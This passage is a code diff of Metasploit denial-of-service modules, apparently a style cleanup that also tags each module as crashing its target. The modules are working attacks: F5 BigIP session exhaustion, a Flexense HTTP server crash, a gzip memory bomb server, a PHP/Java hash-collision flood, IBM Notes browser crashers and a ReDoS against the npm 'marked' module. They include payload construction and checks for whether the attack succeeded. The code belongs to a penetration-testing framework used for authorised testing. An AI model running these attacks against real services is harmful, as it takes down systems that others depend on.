+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(1311),
         OptBool.new('SSL', [true, 'Use SSL', true]),
-      ],
-    self.class)
+      ]
+    )
   end
 
   def run
     connect
 
-    foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
+    foo = 'user=user&password=password&domain=domain&application=' + Rex::Text.pattern_create(2000)
 
     sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
     sploit << "Content-Length: #{foo.length}\r\n\r\n"
     sploit << foo
 
-    sock.put(sploit +"\r\n\r\n")
+    sock.put(sploit + "\r\n\r\n")
 
     disconnect
   end

--- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
+++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
@@ -8,42 +8,48 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',
-      'Description'    => %q{
-        This module exploits a resource exhaustion denial of service in F5 BigIP devices. An
-        unauthenticated attacker can establish multiple connections with BigIP Access Policy
-        Manager (APM) and exhaust all available sessions defined in customer license. In the
-        first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP
-        system creates a session, marks it as pending and then redirects the client to an access
-        policy URI. Since BigIP allocates a new session after the first unauthenticated request,
-        and deletes the session only if an access policy timeout expires, the attacker can exhaust
-        all available sessions by repeatedly sending the initial HTTP request and leaving the
-        sessions as pending.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',
+        'Description' => %q{
+          This module exploits a resource exhaustion denial of service in F5 BigIP devices. An
+          unauthenticated attacker can establish multiple connections with BigIP Access Policy
+          Manager (APM) and exhaust all available sessions defined in customer license. In the
+          first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP
+          system creates a session, marks it as pending and then redirects the client to an access
+          policy URI. Since BigIP allocates a new session after the first unauthenticated request,
+          and deletes the session only if an access policy timeout expires, the attacker can exhaust
+          all available sessions by repeatedly sending the initial HTTP request and leaving the
+          sessions as pending.
+        },
+        'Author' => [
           'Denis Kolegov <dnkolegov[at]gmail.com>',
           'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',
           'Nikita Oleksov <neoleksov[at]gmail.com>'
         ],
-      'References'     =>
-        [
+        'References' => [
           ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html']
         ],
-      'License'        => MSF_LICENSE,
-      'DefaultOptions' =>
-        {
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
           'SSL' => true,
           'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
         }
-    ))
+      )
+    )
 
     register_options(
       [
-        OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]),
-        OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual server isn\'t detected', false])
-      ])
+        OptInt.new('RLIMIT', [true, 'The number of requests to send', 10_000]),
+        OptBool.new('FORCE', [true, "Proceed with attack even if a BigIP virtual server isn't detected", false])
+      ]
+    )
   end
 
   def run
@@ -53,46 +59,52 @@ class MetasploitModule < Msf::Auxiliary
     res = send_request_cgi('method' => 'GET', 'uri' => '/')
 
     unless res
-      print_error("No answer from the BigIP server")
+      print_error('No answer from the BigIP server')
       return
     end
 
     # Simple test based on HTTP Server header to detect BigIP virtual server
     server = res.headers['Server']
-    unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack
-      print_error("BigIP virtual server was not detected. Please check options")
+    unless server =~ /BIG-IP/ || server =~ /BigIP/ || force_attack
+      print_error('BigIP virtual server was not detected. Please check options')
       return
     end
 
-    print_status("Starting DoS attack")
+    print_status('Starting DoS attack')
 
     # Start attack
+    success = false
     limit.times do |step|
       if step % 100 == 0
         print_status("#{step * 100 / limit}% accomplished...")
       end
+
       res = send_request_cgi('method' => 'GET', 'uri' => '/')
-      if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
-        print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.")
-        return
+      if res && res.headers['Location'] =~ %r{/my\.logout\.php3\?errorcode=14}
+        success = true
+        break
       end
+    end
+
+    if success
+      print_good('DoS accomplished: The maximum number of concurrent user sessions has been reached.')
+      return
     end
 
     # Check if attack has failed
     res = send_request_cgi('method' => 'GET', 'uri' => uri)
-    if res.headers['Location'] =~ /\/my.policy/
-      print_error("DoS attack failed. Try to increase the RLIMIT")
+    if res.headers['Location'] =~ %r{/my.policy}
+      print_error('DoS attack failed. Try to increase the RLIMIT')
     else
-      print_status("Result is undefined. Try to manually determine DoS attack result")
+      print_status('Result is undefined. Try to manually determine DoS attack result')
     end
-
-    rescue ::Errno::ECONNRESET
-      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to BigIP")
-    rescue ::Rex::ConnectionTimeout
-      print_error("Unable to connect to BigIP. Please check options")
-    rescue ::OpenSSL::SSL::SSLError
-      print_error("SSL/TLS connection error")
+  rescue ::Errno::ECONNRESET
+    print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
+  rescue ::Rex::ConnectionRefused
+    print_error('Unable to connect to BigIP')
+  rescue ::Rex::ConnectionTimeout
+    print_error('Unable to connect to BigIP. Please check options')
+  rescue ::OpenSSL::SSL::SSLError
+    print_error('SSL/TLS connection error')
   end
 end

--- a/modules/auxiliary/dos/http/flexense_http_server_dos.rb
+++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb
@@ -8,50 +8,56 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Flexense HTTP Server Denial Of Service',
-      'Description'    => %q{
-        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
-        Vulnerability caused by a user mode write access memory violation and can be triggered with
-        rapidly sending variety of HTTP requests with long HTTP header values.
+    super(
+      update_info(
+        info,
+        'Name' => 'Flexense HTTP Server Denial Of Service',
+        'Description' => %q{
+          This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
+          Vulnerability caused by a user mode write access memory violation and can be triggered with
+          rapidly sending variety of HTTP requests with long HTTP header values.
 
-        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.
-      },
-      'Author' 		=> [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.
+        },
+        'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2018-8065'],
           [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
         ],
-      'DisclosureDate' => '2018-03-09'))
+        'DisclosureDate' => '2018-03-09',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
-        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
-      ])
-
+        OptString.new('PacketCount', [ true, 'The number of packets to be sent (Recommended: Above 1725)', 1725 ]),
+        OptString.new('PacketSize', [ true, 'The number of bytes in the Accept header (Recommended: 4088-5090', rand(4088..5090) ])
+      ]
+    )
   end
 
   def check
-    begin
-      connect
-      sock.put("GET / HTTP/1.0\r\n\r\n")
-      res = sock.get
-      if res and res.include? 'Flexense HTTP Server v10.6.24'
-        Exploit::CheckCode::Appears
-      else
-        Exploit::CheckCode::Safe
-      end
-    rescue Rex::ConnectionRefused
-      print_error("Target refused the connection")
-      Exploit::CheckCode::Unknown
-    rescue
-      print_error("Target did not respond to HTTP request")
-      Exploit::CheckCode::Unknown
+    connect
+    sock.put("GET / HTTP/1.0\r\n\r\n")
+    res = sock.get
+    if res && res.include?('Flexense HTTP Server v10.6.24')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
     end
+  rescue Rex::ConnectionRefused
+    print_error('Target refused the connection')
+    Exploit::CheckCode::Unknown
+  rescue StandardError
+    print_error('Target did not respond to HTTP request')
+    Exploit::CheckCode::Unknown
   end
 
   def run
@@ -64,17 +70,17 @@ class MetasploitModule < Msf::Auxiliary
 
     count = 0
     loop do
-      payload = ""
-      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
+      payload = ''
+      payload << 'GET /' + Rex::Text.rand_text_alpha(1..30) + " HTTP/1.1\r\n"
       payload << "Host: 127.0.0.1\r\n"
-      payload << "Accept: "+('A' * size)+"\r\n"
+      payload << 'Accept: ' + ('A' * size) + "\r\n"
       payload << "\r\n\r\n"
       begin
         connect
         sock.put(payload)
         disconnect
         count += 1
-        break if count==datastore['PacketCount']
+        break if count == datastore['PacketCount']
       rescue ::Rex::InvalidDestination
         print_error('Invalid destination!  Continuing...')
       rescue ::Rex::ConnectionTimeout

--- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb
+++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb
@@ -10,40 +10,45 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Gzip Memory Bomb Denial Of Service',
-      'Description'    => %q{
-        This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.
-        Many applications will not implement a length limit check and will eat up all memory and
-        eventually die. This can also be used to kill systems that download/parse content from
-        a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).
+    super(
+      update_info(
+        info,
+        'Name' => 'Gzip Memory Bomb Denial Of Service',
+        'Description' => %q{
+          This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.
+          Many applications will not implement a length limit check and will eat up all memory and
+          eventually die. This can also be used to kill systems that download/parse content from
+          a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).
 
-        A FILEPATH datastore option can also be provided to save the .gz bomb locally.
+          A FILEPATH datastore option can also be provided to save the .gz bomb locally.
 
-        Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly
-        deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)
-        will generate a 300 byte gzipped file that expands to 10GB.
-      },
-      'Author'         =>
-        [
+          Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly
+          deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)
+          will generate a 300 byte gzipped file that expands to 10GB.
+        },
+        'Author' => [
           'info[at]aerasec.de', # 2004 gzip bomb advisory
-          'joev'                # Metasploit module
+          'joev' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ]
         ],
-      'DisclosureDate' => '2004-01-01',
-      'Actions'     =>
-        [
-          [ 'WebServer', 'Description' => 'Host file via web server' ]
+        'DisclosureDate' => '2004-01-01',
+        'Actions' => [
+          [ 'WebServer', { 'Description' => 'Host file via web server' } ]
         ],
-      'PassiveActions' =>
-        [
+        'PassiveActions' => [
           'WebServer'
         ],
-      'DefaultAction'  => 'WebServer'))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -51,8 +56,8 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. Some applications (FF) support > 1.', 1]),
         OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']),
         OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html'])
-      ],
-    self.class)
+      ]
+    )
   end
 
   def run
@@ -62,32 +67,32 @@ class MetasploitModule < Msf::Auxiliary
     exploit # start http server
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     print_status "Sending gzipped payload to client #{cli.peerhost}"
-    rounds = (['gzip']*datastore['ROUNDS']).join(', ')
+    rounds = (['gzip'] * datastore['ROUNDS']).join(', ')
     send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] })
   end
 
   # zlib ftw
-  def generate_gzip(size=default_size, blocks=nil, reps=nil)
+  def generate_gzip(size = default_size, blocks = nil, reps = nil)
     reps ||= datastore['ROUNDS']
     return blocks if reps < 1
 
-    print_status "Generating gzip bomb..."
+    print_status 'Generating gzip bomb...'
     StringIO.open do |io|
       stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)
       buf = nil
       begin
         # add MB of data to the stream. this takes a little while, but doesn't kill memory.
         if blocks.nil?
-          chunklen = 1024*1024*8 # 8mb per chunk
-          a = "A"*chunklen
+          chunklen = 1024 * 1024 * 8 # 8mb per chunk
+          a = 'A' * chunklen
           n = size / chunklen
 
           n.times do |i|
             stream << a
             if i % 100 == 0
-              print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)"
+              print_status "#{i.to_s.rjust(Math.log(n, 10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f / n.to_f * 100)}%)"
             end
           end
         else
@@ -95,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         a = nil # gc a
-        buf = generate_gzip(size, io.string, reps-1)
+        buf = generate_gzip(size, io.string, reps - 1)
       ensure
         stream.flush
         stream.close
@@ -105,6 +110,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def default_size
-    datastore['SIZE']*1024*1024 # mb -> bytes
+    datastore['SIZE'] * 1024 * 1024 # mb -> bytes
   end
 end

--- a/modules/auxiliary/dos/http/hashcollision_dos.rb
+++ b/modules/auxiliary/dos/http/hashcollision_dos.rb
@@ -8,21 +8,22 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Hashtable Collisions',
-      'Description'   => %q{
-        This module uses a denial-of-service (DoS) condition appearing in a variety of
-        programming languages. This vulnerability occurs when storing multiple values
-        in a hash table and all values have the same hash value. This can cause a web server
-        parsing the POST parameters issued with a request into a hash table to consume
-        hours of CPU with a single HTTP request.
+    super(
+      update_info(
+        info,
+        'Name' => 'Hashtable Collisions',
+        'Description' => %q{
+          This module uses a denial-of-service (DoS) condition appearing in a variety of
+          programming languages. This vulnerability occurs when storing multiple values
+          in a hash table and all values have the same hash value. This can cause a web server
+          parsing the POST parameters issued with a request into a hash table to consume
+          hours of CPU with a single HTTP request.
 
-        Currently, only the hash functions for PHP and Java are implemented.
-        This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.
-        It also generates a random payload to bypass some IDS signatures.
-      },
-      'Author'        =>
-        [
+          Currently, only the hash functions for PHP and Java are implemented.
+          This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.
+          It also generates a random payload to bypass some IDS signatures.
+        },
+        'Author' => [
           'Alexander Klink', # advisory
           'Julian Waelde', # advisory
           'Scott A. Crosby', # original advisory
@@ -30,9 +31,8 @@ class MetasploitModule < Msf::Auxiliary
           'Krzysztof Kotowicz', # payload generator
           'Christian Mehlmauer' # metasploit module
         ],
-      'License'       => MSF_LICENSE,
-      'References'    =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['URL', 'http://ocert.org/advisories/ocert-2011-003.html'],
           ['URL', 'https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf'],
           ['URL', 'https://fahrplan.events.ccc.de/congress/2011/Fahrplan/events/4680.en.html'],
@@ -43,24 +43,32 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2011-4885'],
           ['CVE', '2011-4858']
         ],
-      'DisclosureDate'=> '2011-12-28'
-    ))
+        'DisclosureDate' => '2011-12-28',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
-    [
-      OptEnum.new('TARGET', [ true, 'Target to attack', nil, ['PHP','Java']]),
-      OptString.new('URL', [ true, "The request URI", '/' ]),
-      OptInt.new('RLIMIT', [ true, "Number of requests to send", 50 ])
-    ])
+      [
+        OptEnum.new('TARGET', [ true, 'Target to attack', nil, ['PHP', 'Java']]),
+        OptString.new('URL', [ true, 'The request URI', '/' ]),
+        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50 ])
+      ]
+    )
 
     register_advanced_options(
-    [
-      OptInt.new('RecursiveMax', [false, "Maximum recursions when searching for collisionchars", 15]),
-      OptInt.new('MaxPayloadSize', [false, "Maximum size of the Payload in Megabyte. Autoadjust if 0", 0]),
-      OptInt.new('CollisionChars', [false, "Number of colliding chars to find", 5]),
-      OptInt.new('CollisionCharLength', [false, "Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)", 2]),
-      OptInt.new('PayloadLength', [false, "Length of each parameter in the payload", 8])
-    ])
+      [
+        OptInt.new('RecursiveMax', [false, 'Maximum recursions when searching for collisionchars', 15]),
+        OptInt.new('MaxPayloadSize', [false, 'Maximum size of the Payload in Megabyte. Autoadjust if 0', 0]),
+        OptInt.new('CollisionChars', [false, 'Number of colliding chars to find', 5]),
+        OptInt.new('CollisionCharLength', [false, 'Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)', 2]),
+        OptInt.new('PayloadLength', [false, 'Length of each parameter in the payload', 8])
+      ]
+    )
   end
 
   def generate_payload
@@ -69,17 +77,17 @@ class MetasploitModule < Msf::Auxiliary
 
     @recursive_counter = 1
     collision_chars = compute_collision_chars
-    return nil if collision_chars == nil
+    return nil if collision_chars.nil?
 
     length = datastore['PayloadLength']
     size = collision_chars.length
-    post = ""
-    max_value_float = size ** length
+    post = ''
+    max_value_float = size**length
     max_value_int = max_value_float.floor
     print_status("#{rhost}:#{rport} - Generating POST data...")
     for i in 0.upto(max_value_int)
       input_string = i.to_s(size)
-      result = input_string.rjust(length, "0")
+      result = input_string.rjust(length, '0')
       collision_chars.each do |key, value|
         result = result.gsub(key, value)
       end
@@ -99,7 +107,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     # Generate all possible strings
     source = a
-    for i in Range.new(1,length-1)
+    for _ in Range.new(1, length - 1)
       source = source.product(a)
     end
     source = source.map(&:join)
@@ -107,15 +115,16 @@ class MetasploitModule < Msf::Auxiliary
     base_str = source.sample
     base_hash = @function.call(base_str)
     hashes[counter.to_s] = base_str
-    counter = counter + 1
+    counter += 1
     for item in source
       if item == base_str
         next
       end
+
       if @function.call(item) == base_hash
         # Hooray we found a matching hash
         hashes[counter.to_s] = item
-        counter = counter + 1
+        counter += 1
       end
       if counter >= datastore['CollisionChars']
         break
@@ -128,14 +137,14 @@ class MetasploitModule < Msf::Auxiliary
         return nil
       end
       print_status("#{rhost}:#{rport} - #{@recursive_counter}: Not enough values found. Trying again...")
-      @recursive_counter = @recursive_counter + 1
+      @recursive_counter += 1
       hashes = compute_collision_chars
     else
       print_status("#{rhost}:#{rport} - Found values:")
       hashes.each_value do |item|
         print_status("#{rhost}:#{rport} -\tValue: #{item}\tHash: #{@function.call(item)}")
         item.each_char do |c|
-          print_status("#{rhost}:#{rport} -\t\tValue: #{c}\tCharcode: #{c.unpack("C")}")
+          print_status("#{rhost}:#{rport} -\t\tValue: #{c}\tCharcode: #{c.unpack('C')}")
         end
       end
     end
@@ -147,8 +156,8 @@ class MetasploitModule < Msf::Auxiliary
     counter = input_string.length - 1
     result = start
     input_string.each_char do |item|
-      result = result + ((base ** counter) * item.ord)
-      counter = counter - 1
+      result += ((base**counter) * item.ord)
+      counter -= 1
     end
     return result.round
   end
@@ -165,47 +174,48 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     case datastore['TARGET']
-      when /PHP/
-        @function = method(:djbx33a)
-        @char_range = Range.new(0, 255)
-        if (datastore['MaxPayloadSize'] <= 0)
-          datastore['MaxPayloadSize'] = 8   # XXX: Refactor
-        end
-      when /Java/
-        @function = method(:djbx31a)
-        @char_range = Range.new(0, 128)
-        if (datastore['MaxPayloadSize'] <= 0)
-          datastore['MaxPayloadSize'] = 2   # XXX: Refactor
-        end
-      else
-        raise RuntimeError, "Target #{datastore['TARGET']} not supported"
+    when /PHP/
+      @function = method(:djbx33a)
+      @char_range = Range.new(0, 255)
+      if (datastore['MaxPayloadSize'] <= 0)
+        datastore['MaxPayloadSize'] = 8   # XXX: Refactor
+      end
+    when /Java/
+      @function = method(:djbx31a)
+      @char_range = Range.new(0, 128)
+      if (datastore['MaxPayloadSize'] <= 0)
+        datastore['MaxPayloadSize'] = 2   # XXX: Refactor
+      end
+    else
+      raise "Target #{datastore['TARGET']} not supported"
     end
 
     print_status("#{rhost}:#{rport} - Generating payload...")
     payload = generate_payload
-    return if payload == nil
+    return if payload.nil?
+
     # trim to maximum payload size (in MB)
-    max_in_mb = datastore['MaxPayloadSize']*1024*1024
-    payload = payload[0,max_in_mb]
+    max_in_mb = datastore['MaxPayloadSize'] * 1024 * 1024
+    payload = payload[0, max_in_mb]
     # remove last invalid(cut off) parameter
-    position = payload.rindex("=&")
-    payload = payload[0,position+1]
+    position = payload.rindex('=&')
+    payload = payload[0, position + 1]
     print_status("#{rhost}:#{rport} -Payload generated")
 
     for x in 1..datastore['RLIMIT']
       print_status("#{rhost}:#{rport} - Sending request ##{x}...")
       opts = {
         'method'	=> 'POST',
-        'uri'		=> normalize_uri(datastore['URL']),
-        'data'		=> payload
+        'uri'	=> normalize_uri(datastore['URL']),
+        'data'	=> payload
       }
       begin
         c = connect
         r = c.request_cgi(opts)
         c.send_request(r)
         # Don't wait for a response, can take hours
-      rescue ::Rex::ConnectionError => exception
-        print_error("#{rhost}:#{rport} - Unable to connect: '#{exception.message}'")
+      rescue ::Rex::ConnectionError => e
+        print_error("#{rhost}:#{rport} - Unable to connect: '#{e.message}'")
         return
       ensure
         disconnect(c) if c

--- a/modules/auxiliary/dos/http/ibm_lotus_notes.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes.rb
@@ -10,24 +10,29 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "IBM Notes encodeURI DOS",
-        'Description'    => %q(
+        'Name' => 'IBM Notes encodeURI DOS',
+        'Description' => %q{
           This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
           If successful, it could cause the Notes client to hang and have to be restarted.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Dhiraj Mishra',
         ],
-        'References'     => [
+        'References' => [
           [ 'EDB', '42602'],
           [ 'CVE', '2017-1129' ],
           [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
         ],
         'DisclosureDate' => '2017-08-31',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
         'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -10,23 +10,28 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "IBM Notes Denial Of Service",
-        'Description'    => %q(
+        'Name' => 'IBM Notes Denial Of Service',
+        'Description' => %q{
           This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
           If successful, the browser will crash after viewing the webpage.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Dhiraj Mishra',
         ],
-        'References'     => [
+        'References' => [
           ['EDB', '42604'],
           [ 'CVE', '2017-1130' ]
         ],
         'DisclosureDate' => '2017-08-31',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
         'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end

--- a/modules/auxiliary/dos/http/marked_redos.rb
+++ b/modules/auxiliary/dos/http/marked_redos.rb
@@ -8,27 +8,33 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'marked npm module "heading" ReDoS',
-      'Description' => %q{
-        This module exploits a Regular Expression Denial of Service vulnerability
-        in the npm module "marked". The vulnerable portion of code that this module
-        targets is in the "heading" regular expression. Web applications that use
-        "marked" for generating html from markdown are vulnerable. Versions up to
-        0.4.0 are vulnerable.
-      },
-      'References'  =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'marked npm module "heading" ReDoS',
+        'Description' => %q{
+          This module exploits a Regular Expression Denial of Service vulnerability
+          in the npm module "marked". The vulnerable portion of code that this module
+          targets is in the "heading" regular expression. Web applications that use
+          "marked" for generating html from markdown are vulnerable. Versions up to
+          0.4.0 are vulnerable.
+        },
+        'References' => [
           ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],
           ['CWE', '400']
         ],
-      'Author'      =>
-        [
+        'Author' => [
           'Adam Cazzolla, Sonatype Security Research',
           'Nick Starke, Sonatype Security Research'
         ],
-      'License'     =>  MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(80),
@@ -48,70 +54,64 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def trigger_redos
-    begin
-      print_status("Sending ReDoS request to #{peer}.")
+    print_status("Sending ReDoS request to #{peer}.")
 
-      params = {
-        'uri' => normalize_uri(target_uri.path),
-        'method' => datastore['HTTP_METHOD'],
-          ("vars_#{datastore['HTTP_METHOD'].downcase}") => {
-            datastore['HTTP_PARAMETER'] =>  "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)
-        }
+    params = {
+      'uri' => normalize_uri(target_uri.path),
+      'method' => datastore['HTTP_METHOD'],
+      "vars_#{datastore['HTTP_METHOD'].downcase}" => {
+        datastore['HTTP_PARAMETER'] => '# #' + (' ' * 20 * 1024) + Rex::Text.rand_text_alpha(1)
       }
+    }
 
-      res = send_request_cgi(params)
+    res = send_request_cgi(params)
 
-      if res
-        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
-      end
-
-      print_status("No response received from #{peer}, service is most likely unresponsive.")
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{peer}.")
-    rescue ::Timeout::Error
-      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
+    if res
+      fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
     end
+
+    print_status("No response received from #{peer}, service is most likely unresponsive.")
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{peer}.")
+  rescue ::Timeout::Error
+    print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
   end
 
   def test_service_unresponsive
-    begin
-      print_status('Testing for service unresponsiveness.')
+    print_status('Testing for service unresponsiveness.')
 
-      res = send_request_cgi({
-        'uri' => '/' + Rex::Text.rand_text_alpha(8),
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => '/' + Rex::Text.rand_text_alpha(8),
+      'method' => 'GET'
+    })
 
-      if res.nil?
-        print_good('Service not responding.')
-      else
-        print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
-      end
-    rescue ::Rex::ConnectionRefused
-      print_error('An unknown error occurred.')
-    rescue ::Timeout::Error
-      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
+    if res.nil?
+      print_good('Service not responding.')
+    else
+      print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
     end
+  rescue ::Rex::ConnectionRefused
+    print_error('An unknown error occurred.')
+  rescue ::Timeout::Error
+    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
   end
 
   def test_service
-    begin
-      print_status('Testing Service to make sure it is working.')
+    print_status('Testing Service to make sure it is working.')
 
-      res = send_request_cgi({
-        'uri' => '/' + Rex::Text.rand_text_alpha(8),
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => '/' + Rex::Text.rand_text_alpha(8),
+      'method' => 'GET'
+    })
 
-      if res && res.code >= 100 && res.code < 500
-        print_status("Test request successful, attempting to send payload. Server returned #{res.code}")
-        return true
-      else
-        return false
-      end
